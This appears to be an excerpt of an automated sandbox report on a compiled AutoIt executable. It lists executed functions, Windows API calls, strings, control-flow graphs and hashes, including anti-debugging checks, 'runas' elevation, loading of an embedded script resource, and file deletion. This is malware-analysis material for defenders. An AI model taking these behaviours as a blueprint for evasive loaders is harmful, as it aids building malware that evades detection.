103004->102981 103006 31522e 59 API calls 103005->103006 103007 34e8f2 RegQueryValueExW 103006->103007 103009 34e90f 103007->103009 103011 34e929 103007->103011 103008 3179f2 59 API calls 103008->103014 103010 317bcc 59 API calls 103009->103010 103010->103011 103011->103001 103012 317de1 59 API calls 103012->103014 103013 313f74 59 API calls 103013->103014 103014->103004 103014->103008 103014->103012 103014->103013 103016 341940 __write_nolock 103015->103016 103017 330518 GetFullPathNameW 103016->103017 103018 33053a 103017->103018 103019 317bcc 59 API calls 103018->103019 103020 317165 103019->103020 103020->102992 103021 12f9560 103036 12f71b0 103021->103036 103023 12f9606 103039 12f9450 103023->103039 103042 12fa630 GetPEB 103036->103042 103038 12f783b 103038->103023 103040 12f9459 Sleep 103039->103040 103041 12f9467 103040->103041 103043 12fa65a 103042->103043 103043->103038

                                                                          Executed Functions

                                                                          Function 00313B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00313B68
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00313B7A
                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,003D52F8,003D52E0,?,?), ref: 00313BEB
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                            • Part of subcall function 0032092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00313C14,003D52F8,?,?,?), ref: 0032096E
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00313C6F
                                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003C7770,00000010), ref: 0034D281
                                                                          • SetCurrentDirectoryW.KERNEL32(?,003D52F8,?,?,?), ref: 0034D2B9
                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003C4260,003D52F8,?,?,?), ref: 0034D33F
                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 0034D346
                                                                            • Part of subcall function 00313A46: GetSysColorBrush.USER32(0000000F), ref: 00313A50
                                                                            • Part of subcall function 00313A46: LoadCursorW.USER32(00000000,00007F00), ref: 00313A5F
                                                                            • Part of subcall function 00313A46: LoadIconW.USER32(00000063), ref: 00313A76
                                                                            • Part of subcall function 00313A46: LoadIconW.USER32(000000A4), ref: 00313A88
                                                                            • Part of subcall function 00313A46: LoadIconW.USER32(000000A2), ref: 00313A9A
                                                                            • Part of subcall function 00313A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00313AC0
                                                                            • Part of subcall function 00313A46: RegisterClassExW.USER32(?), ref: 00313B16
                                                                            • Part of subcall function 003139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00313A03
                                                                            • Part of subcall function 003139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00313A24
                                                                            • Part of subcall function 003139D5: ShowWindow.USER32(00000000,?,?), ref: 00313A38
                                                                            • Part of subcall function 003139D5: ShowWindow.USER32(00000000,?,?), ref: 00313A41
                                                                            • Part of subcall function 0031434A: _memset.LIBCMT ref: 00314370
                                                                            • Part of subcall function 0031434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00314415
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                          • String ID: This is a third-party compiled AutoIt script.$runas$%:
                                                                          • API String ID: 529118366-1850546503
                                                                          • Opcode ID: 727961ddc67299ec03197dce51814a824c4d91fbb49f56205354b10361fb5634
                                                                          • Instruction ID: 78b4926d43b6d037bbbca7da95e66aab4580899fbdd311f9c70fc6a82cb5f86c
                                                                          • Opcode Fuzzy Hash: 727961ddc67299ec03197dce51814a824c4d91fbb49f56205354b10361fb5634
                                                                          • Instruction Fuzzy Hash: B0510775948108AECF0BEBB4EC06EFD7B7CAF4C710F044467F451AA2A1DA705689CB61
                                                                          Function 003149A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1037 3149a0-314a00 call 317667 GetVersionExW call 317bcc 1042 314a06 1037->1042 1043 314b0b-314b0d 1037->1043 1045 314a09-314a0e 1042->1045 1044 34d767-34d773 1043->1044 1046 34d774-34d778 1044->1046 1047 314b12-314b13 1045->1047 1048 314a14 1045->1048 1050 34d77a 1046->1050 1051 34d77b-34d787 1046->1051 1049 314a15-314a4c call 317d2c call 317726 1047->1049 1048->1049 1059 34d864-34d867 1049->1059 1060 314a52-314a53 1049->1060 1050->1051 1051->1046 1053 34d789-34d78e 1051->1053 1053->1045 1055 34d794-34d79b 1053->1055 1055->1044 1057 34d79d 1055->1057 1061 34d7a2-34d7a5 1057->1061 1062 34d880-34d884 1059->1062 1063 34d869 1059->1063 1060->1061 1064 314a59-314a64 1060->1064 1065 314a93-314aaa GetCurrentProcess IsWow64Process 1061->1065 1066 34d7ab-34d7c9 1061->1066 1071 34d886-34d88f 1062->1071 1072 34d86f-34d878 1062->1072 1067 34d86c 1063->1067 1068 314a6a-314a6c 1064->1068 1069 34d7ea-34d7f0 1064->1069 1073 314aac 1065->1073 1074 314aaf-314ac0 1065->1074 1066->1065 1070 34d7cf-34d7d5 1066->1070 1067->1072 1075 34d805-34d811 1068->1075 1076 314a72-314a75 1068->1076 1079 34d7f2-34d7f5 1069->1079 1080 34d7fa-34d800 1069->1080 1077 34d7d7-34d7da 1070->1077 1078 34d7df-34d7e5 1070->1078 1071->1067 1081 34d891-34d894 1071->1081 1072->1062 1073->1074 1082 314ac2-314ad2 call 314b37 1074->1082 1083 314b2b-314b35 GetSystemInfo 1074->1083 1087 34d813-34d816 1075->1087 1088 34d81b-34d821 1075->1088 1084 34d831-34d834 1076->1084 1085 314a7b-314a8a 1076->1085 1077->1065 1078->1065 1079->1065 1080->1065 1081->1072 1094 314ad4-314ae1 call 314b37 1082->1094 1095 314b1f-314b29 GetSystemInfo 1082->1095 1086 314af8-314b08 1083->1086 1084->1065 1093 34d83a-34d84f 1084->1093 1090 314a90 1085->1090 1091 34d826-34d82c 1085->1091 1087->1065 1088->1065 1090->1065 1091->1065 1096 34d851-34d854 1093->1096 1097 34d859-34d85f 1093->1097 1102 314ae3-314ae7 GetNativeSystemInfo 1094->1102 1103 314b18-314b1d 1094->1103 1098 314ae9-314aed 1095->1098 1096->1065 1097->1065 1098->1086 1101 314aef-314af2 FreeLibrary 1098->1101 1101->1086 1102->1098 1103->1102
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 003149CD
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • GetCurrentProcess.KERNEL32(?,0039FAEC,00000000,00000000,?), ref: 00314A9A
                                                                          • IsWow64Process.KERNEL32(00000000), ref: 00314AA1
                                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00314AE7
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00314AF2
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00314B23
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00314B2F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                          • String ID:
                                                                          • API String ID: 1986165174-0
                                                                          • Opcode ID: 98da9d988bab95e5328e26355879355f2d4f6a34cada6382f0f52a82ee6cf413
                                                                          • Instruction ID: 48c1a6afb39b4f25c96eb8996f7f9bf0c974fa81e5b4acb227947f8ca6b9140f
                                                                          • Opcode Fuzzy Hash: 98da9d988bab95e5328e26355879355f2d4f6a34cada6382f0f52a82ee6cf413
                                                                          • Instruction Fuzzy Hash: 7991923198D7C0DEC736DB6894501EABFF9AF2E300B5949AED0C797A41D220F988C759
                                                                          Function 00314E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1104 314e89-314ea1 CreateStreamOnHGlobal 1105 314ec1-314ec6 1104->1105 1106 314ea3-314eba FindResourceExW 1104->1106 1107 314ec0 1106->1107 1108 34d933-34d942 LoadResource 1106->1108 1107->1105 1108->1107 1109 34d948-34d956 SizeofResource 1108->1109 1109->1107 1110 34d95c-34d967 LockResource 1109->1110 1110->1107 1111 34d96d-34d98b 1110->1111 1111->1107
                                                                          APIs
                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00314D8E,?,?,00000000,00000000), ref: 00314E99
                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00314D8E,?,?,00000000,00000000), ref: 00314EB0
                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00314D8E,?,?,00000000,00000000,?,?,?,?,?,?,00314E2F), ref: 0034D937
                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00314D8E,?,?,00000000,00000000,?,?,?,?,?,?,00314E2F), ref: 0034D94C
                                                                          • LockResource.KERNEL32(00314D8E,?,?,00314D8E,?,?,00000000,00000000,?,?,?,?,?,?,00314E2F,00000000), ref: 0034D95F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                          • String ID: SCRIPT
                                                                          • API String ID: 3051347437-3967369404
                                                                          • Opcode ID: 94ca90d7a9315b529ad37e9b18dc7e82858fdea97232d3e3463521e574f3bfe0
                                                                          • Instruction ID: 6adc7ae6004acb8af23d1e0fadefd001e27c40ff628ba35d49dd5f7e293bf66d
                                                                          • Opcode Fuzzy Hash: 94ca90d7a9315b529ad37e9b18dc7e82858fdea97232d3e3463521e574f3bfe0
                                                                          • Instruction Fuzzy Hash: 8A115EB5240700BFD7268B65EC48F677BBEFBC9B11F208669F405C6250DB62E8408A70
                                                                          Function 0031E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Dd=$Dd=$Dd=$Dd=$Variable must be of type 'Object'.
                                                                          • API String ID: 0-915380733
                                                                          • Opcode ID: 1b9f97da69df06489a3636ed9460352bd5bf2f3337b926ce2cef81ac8b46661d
                                                                          • Instruction ID: e7188432e635bcb101acd9050ed20b0d829a645fa58391fcaba7e6a06e7cc947
                                                                          • Opcode Fuzzy Hash: 1b9f97da69df06489a3636ed9460352bd5bf2f3337b926ce2cef81ac8b46661d
                                                                          • Instruction Fuzzy Hash: B8A26A75A00215CFCB2ACF54C480AEAB7B5FF5D314F258469EC159B351D736AD82CB90
                                                                          Function 0037445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,0034E398), ref: 0037446A
                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 0037447B
                                                                          • FindClose.KERNEL32(00000000), ref: 0037448B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                          • String ID:
                                                                          • API String ID: 48322524-0
                                                                          • Opcode ID: c0f8dbe748dbeb1167f24e4624f0e433f228f98798ef1f9a7c1c142aaf3a6f50
                                                                          • Instruction ID: bdf41158468185fcf84e58a1052234dd8e5338c15dda0648ec17672fa2a94069
                                                                          • Opcode Fuzzy Hash: c0f8dbe748dbeb1167f24e4624f0e433f228f98798ef1f9a7c1c142aaf3a6f50
                                                                          • Instruction Fuzzy Hash: 99E020374145006F83216B38EC4D5E9775C9F05335F244B17F879C10D0E778AD00A5D5
                                                                          Function 003209D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00320A5B
                                                                          • timeGetTime.WINMM ref: 00320D16
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00320E53
                                                                          • Sleep.KERNEL32(0000000A), ref: 00320E61
                                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00320EFA
                                                                          • DestroyWindow.USER32 ref: 00320F06
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00320F20
                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00354E83
                                                                          • TranslateMessage.USER32(?), ref: 00355C60
                                                                          • DispatchMessageW.USER32(?), ref: 00355C6E
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00355C82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb=$pb=$pb=$pb=
                                                                          • API String ID: 4212290369-595688798
                                                                          • Opcode ID: c55a7abd0036fbbb6a348790945340503ecf23535f31d4f68c125103c528123b
                                                                          • Instruction ID: 4405fee1b1981941df432f66fb892f1a9edf14c4dee86f954c598fe213e690f4
                                                                          • Opcode Fuzzy Hash: c55a7abd0036fbbb6a348790945340503ecf23535f31d4f68c125103c528123b
                                                                          • Instruction Fuzzy Hash: 49B2F670608741DFD72BDF24D895FAAB7E4BF84305F15491DE8598B2A1C771E888CB82
                                                                          Function 00379155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00378F5F: __time64.LIBCMT ref: 00378F69
                                                                            • Part of subcall function 00314EE5: _fseek.LIBCMT ref: 00314EFD
                                                                          • __wsplitpath.LIBCMT ref: 00379234
                                                                            • Part of subcall function 003340FB: __wsplitpath_helper.LIBCMT ref: 0033413B
                                                                          • _wcscpy.LIBCMT ref: 00379247
                                                                          • _wcscat.LIBCMT ref: 0037925A
                                                                          • __wsplitpath.LIBCMT ref: 0037927F
                                                                          • _wcscat.LIBCMT ref: 00379295
                                                                          • _wcscat.LIBCMT ref: 003792A8
                                                                            • Part of subcall function 00378FA5: _memmove.LIBCMT ref: 00378FDE
                                                                            • Part of subcall function 00378FA5: _memmove.LIBCMT ref: 00378FED
                                                                          • _wcscmp.LIBCMT ref: 003791EF
                                                                            • Part of subcall function 00379734: _wcscmp.LIBCMT ref: 00379824
                                                                            • Part of subcall function 00379734: _wcscmp.LIBCMT ref: 00379837
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00379452
                                                                          • _wcsncpy.LIBCMT ref: 003794C5
                                                                          • DeleteFileW.KERNEL32(?,?), ref: 003794FB
                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00379511
                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00379522
                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00379534
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                          • String ID:
                                                                          • API String ID: 1500180987-0
                                                                          • Opcode ID: e3b3829ed0833fb962f5d0c978e544ddf41d4d00f68bfb84d2c5675aa8fdcb30
                                                                          • Instruction ID: b65c06efe516e5149c0f0efe607f1bbeced9816f0d4559c252d1f61a8db7b083
                                                                          • Opcode Fuzzy Hash: e3b3829ed0833fb962f5d0c978e544ddf41d4d00f68bfb84d2c5675aa8fdcb30
                                                                          • Instruction Fuzzy Hash: 7DC16EB1D0021DAADF26DF95CC85ADEB7BDEF49310F0081A6F609EB141DB349A858F61
                                                                          Function 0031301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00313074
                                                                          • RegisterClassExW.USER32(00000030), ref: 0031309E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003130AF
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003130CC
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003130DC
                                                                          • LoadIconW.USER32(000000A9), ref: 003130F2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00313101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: e2af02d6e4e5210bfe176e66658890597adbf2082da6976dea39c40301eacb97
                                                                          • Instruction ID: 8a31e323c01eb0245bab39af7f6836dae45ed303c6fb7d59b9a02895246c01cf
                                                                          • Opcode Fuzzy Hash: e2af02d6e4e5210bfe176e66658890597adbf2082da6976dea39c40301eacb97
                                                                          • Instruction Fuzzy Hash: 90312AB1941309AFDB42CFA4EC45ACDBBF8FB09310F10452BE580E62A0D3B64595CF51
                                                                          Function 00313041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00313074
                                                                          • RegisterClassExW.USER32(00000030), ref: 0031309E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003130AF
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003130CC
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003130DC
                                                                          • LoadIconW.USER32(000000A9), ref: 003130F2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00313101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: edaf6674672fd35454cecbfc152bbddf3f6e3764f08e347b8415cc58b4afa934
                                                                          • Instruction ID: 42f8038222af03448920f99ca7724654e3c6e9a0794872c0e1da9936791dc74d
                                                                          • Opcode Fuzzy Hash: edaf6674672fd35454cecbfc152bbddf3f6e3764f08e347b8415cc58b4afa934
                                                                          • Instruction Fuzzy Hash: 7C21C5B5A01718AFDB02DFA4E849BDDBBF8FB08701F10412BF510E62A0D7B245549F91
                                                                          Function 0031708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00314706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003D52F8,?,003137AE,?), ref: 00314724
                                                                            • Part of subcall function 0033050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00317165), ref: 0033052D
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003171A8
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0034E8C8
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0034E909
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0034E947
                                                                          • _wcscat.LIBCMT ref: 0034E9A0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                          • API String ID: 2673923337-2727554177
                                                                          • Opcode ID: 8a45a3d9d0148926360026df849bbef11c3818e2c227526152f32b5bf71d7447
                                                                          • Instruction ID: 5deeb473116660ca58ca86e8a004dd1059f7a97c27334c93c4d76da152f30692
                                                                          • Opcode Fuzzy Hash: 8a45a3d9d0148926360026df849bbef11c3818e2c227526152f32b5bf71d7447
                                                                          • Instruction Fuzzy Hash: E3715D715093019EC706EF65E8829ABBBFCFF89310F44092FF4558B2A1DB719949CB52
                                                                          Function 00313633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
